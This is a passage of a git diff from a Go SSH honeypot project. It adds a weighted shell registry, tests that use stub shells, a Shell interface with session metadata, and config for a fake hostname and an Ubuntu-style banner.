|
|
||||||
|
// Select picks a shell using weighted random selection.
|
||||||
|
func (r *Registry) Select() (Shell, error) {
|
||||||
|
r.mu.RLock()
|
||||||
|
defer r.mu.RUnlock()
|
||||||
|
|
||||||
|
if len(r.entries) == 0 {
|
||||||
|
return nil, errors.New("no shells registered")
|
||||||
|
}
|
||||||
|
|
||||||
|
total := 0
|
||||||
|
for _, e := range r.entries {
|
||||||
|
total += e.weight
|
||||||
|
}
|
||||||
|
|
||||||
|
pick := rand.IntN(total)
|
||||||
|
cumulative := 0
|
||||||
|
for _, e := range r.entries {
|
||||||
|
cumulative += e.weight
|
||||||
|
if pick < cumulative {
|
||||||
|
return e.shell, nil
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Should never reach here, but return last entry as fallback.
|
||||||
|
return r.entries[len(r.entries)-1].shell, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// Get returns a shell by name.
|
||||||
|
func (r *Registry) Get(name string) (Shell, bool) {
|
||||||
|
r.mu.RLock()
|
||||||
|
defer r.mu.RUnlock()
|
||||||
|
|
||||||
|
for _, e := range r.entries {
|
||||||
|
if e.shell.Name() == name {
|
||||||
|
return e.shell, true
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return nil, false
|
||||||
|
}
|
||||||
107
internal/shell/registry_test.go
Normal file
107
internal/shell/registry_test.go
Normal file
@@ -0,0 +1,107 @@
|
|||||||
|
package shell
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"io"
|
||||||
|
"testing"
|
||||||
|
)
|
||||||
|
|
||||||
|
// stubShell implements Shell for testing.
|
||||||
|
type stubShell struct {
|
||||||
|
name string
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *stubShell) Name() string { return s.name }
|
||||||
|
func (s *stubShell) Description() string { return "stub" }
|
||||||
|
func (s *stubShell) Handle(_ context.Context, _ *SessionContext, _ io.ReadWriteCloser) error {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestRegistryRegisterAndGet(t *testing.T) {
|
||||||
|
r := NewRegistry()
|
||||||
|
sh := &stubShell{name: "test"}
|
||||||
|
|
||||||
|
if err := r.Register(sh, 1); err != nil {
|
||||||
|
t.Fatalf("Register: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
got, ok := r.Get("test")
|
||||||
|
if !ok {
|
||||||
|
t.Fatal("Get returned false")
|
||||||
|
}
|
||||||
|
if got.Name() != "test" {
|
||||||
|
t.Errorf("Name = %q, want %q", got.Name(), "test")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestRegistryGetMissing(t *testing.T) {
|
||||||
|
r := NewRegistry()
|
||||||
|
_, ok := r.Get("nope")
|
||||||
|
if ok {
|
||||||
|
t.Fatal("Get returned true for missing shell")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestRegistryDuplicateName(t *testing.T) {
|
||||||
|
r := NewRegistry()
|
||||||
|
r.Register(&stubShell{name: "dup"}, 1)
|
||||||
|
err := r.Register(&stubShell{name: "dup"}, 1)
|
||||||
|
if err == nil {
|
||||||
|
t.Fatal("expected error for duplicate name")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestRegistryInvalidWeight(t *testing.T) {
|
||||||
|
r := NewRegistry()
|
||||||
|
err := r.Register(&stubShell{name: "a"}, 0)
|
||||||
|
if err == nil {
|
||||||
|
t.Fatal("expected error for weight 0")
|
||||||
|
}
|
||||||
|
err = r.Register(&stubShell{name: "b"}, -1)
|
||||||
|
if err == nil {
|
||||||
|
t.Fatal("expected error for negative weight")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestRegistrySelectEmpty(t *testing.T) {
|
||||||
|
r := NewRegistry()
|
||||||
|
_, err := r.Select()
|
||||||
|
if err == nil {
|
||||||
|
t.Fatal("expected error from empty registry")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestRegistrySelectSingle(t *testing.T) {
|
||||||
|
r := NewRegistry()
|
||||||
|
r.Register(&stubShell{name: "only"}, 1)
|
||||||
|
|
||||||
|
for range 10 {
|
||||||
|
sh, err := r.Select()
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("Select: %v", err)
|
||||||
|
}
|
||||||
|
if sh.Name() != "only" {
|
||||||
|
t.Errorf("Name = %q, want %q", sh.Name(), "only")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestRegistrySelectWeighted(t *testing.T) {
|
||||||
|
r := NewRegistry()
|
||||||
|
r.Register(&stubShell{name: "heavy"}, 100)
|
||||||
|
r.Register(&stubShell{name: "light"}, 1)
|
||||||
|
|
||||||
|
counts := map[string]int{}
|
||||||
|
for range 1000 {
|
||||||
|
sh, err := r.Select()
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("Select: %v", err)
|
||||||
|
}
|
||||||
|
counts[sh.Name()]++
|
||||||
|
}
|
||||||
|
|
||||||
|
// "heavy" has weight 100 vs "light" weight 1, so heavy should get ~99%.
|
||||||
|
if counts["heavy"] < 900 {
|
||||||
|
t.Errorf("heavy selected %d/1000 times, expected >900", counts["heavy"])
|
||||||
|
}
|
||||||
|
}
|
||||||
33
internal/shell/shell.go
Normal file
33
internal/shell/shell.go
Normal file
@@ -0,0 +1,33 @@
|
|||||||
|
package shell
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"io"
|
||||||
|
|
||||||
|
"git.t-juice.club/torjus/oubliette/internal/storage"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Shell is the interface that all honeypot shell implementations must satisfy.
|
||||||
|
type Shell interface {
|
||||||
|
Name() string
|
||||||
|
Description() string
|
||||||
|
Handle(ctx context.Context, sess *SessionContext, rw io.ReadWriteCloser) error
|
||||||
|
}
|
||||||
|
|
||||||
|
// SessionContext carries metadata about the current SSH session.
|
||||||
|
type SessionContext struct {
|
||||||
|
SessionID string
|
||||||
|
Username string
|
||||||
|
RemoteAddr string
|
||||||
|
ClientVersion string
|
||||||
|
Store storage.Store
|
||||||
|
ShellConfig map[string]any
|
||||||
|
CommonConfig ShellCommonConfig
|
||||||
|
}
|
||||||
|
|
||||||
|
// ShellCommonConfig holds settings shared across all shell types.
|
||||||
|
type ShellCommonConfig struct {
|
||||||
|
Hostname string
|
||||||
|
Banner string
|
||||||
|
FakeUser string // override username in prompt; empty = use authenticated user
|
||||||
|
}
|
||||||
@@ -22,3 +22,8 @@ password = "admin"
|
|||||||
db_path = "oubliette.db"
|
db_path = "oubliette.db"
|
||||||
retention_days = 90
|
retention_days = 90
|
||||||
retention_interval = "1h"
|
retention_interval = "1h"
|
||||||
|
|
||||||
|
[shell]
|
||||||
|
hostname = "ubuntu-server"
|
||||||
|
# banner = "Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-89-generic x86_64)\r\n\r\n"
|
||||||
|
# fake_user = "" # override username in prompt; empty = use authenticated user
|
||||||
|
|||||||
Reference in New Issue
Block a user